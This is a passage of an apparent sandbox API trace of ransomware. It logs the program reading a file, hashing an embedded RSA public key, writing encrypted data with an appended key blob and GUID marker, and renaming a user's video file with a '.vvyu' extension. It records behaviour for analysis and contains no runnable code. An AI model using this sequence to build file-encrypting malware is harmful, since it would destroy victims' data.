lpDistanceToMoveHigh=0x0) returned 0x0 [0195.838] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xb6b6, lpOverlapped=0x0) returned 1 [0195.839] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.839] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.839] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.839] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.841] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.841] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.841] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.841] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.841] GetLastError () returned 0x0 [0195.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.841] GetLastError () returned 0x0 [0195.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.842] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.842] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.842] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.842] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.842] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb6c0) returned 0x2af5168 [0195.843] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9f90 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae9fd8 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64d0 [0195.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0195.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6518 [0195.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.845] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0195.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6518 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6500 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.848] GetCurrentThreadId () returned 0x5d8 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8778 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.849] GetCurrentThreadId () returned 0x5d8 [0195.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0195.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6500 [0195.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0195.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6518 [0195.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64e8 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6578 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6548 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6530 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6590 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6530 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6548 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6500 [0195.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0195.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6560 | out: hHeap=0x2c0000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0195.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6500 | out: hHeap=0x2c0000) returned 1 [0195.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0195.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0195.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0195.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6530 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6518 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9fd8 | out: hHeap=0x2c0000) returned 1 [0195.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0195.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.875] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xb6b1, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xb6b1, lpOverlapped=0x0) returned 1 [0195.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.876] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb6b6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.876] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0195.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0195.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.878] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0195.878] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.878] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.878] CloseHandle (hObject=0x584) returned 1 [0195.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.891] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ippAwK.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\cvfgvyfl7tfjuo7\\ippawk.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\cvfGVyFL7tFjUO7\\ippAwK.flv.vvyu" (normalized: 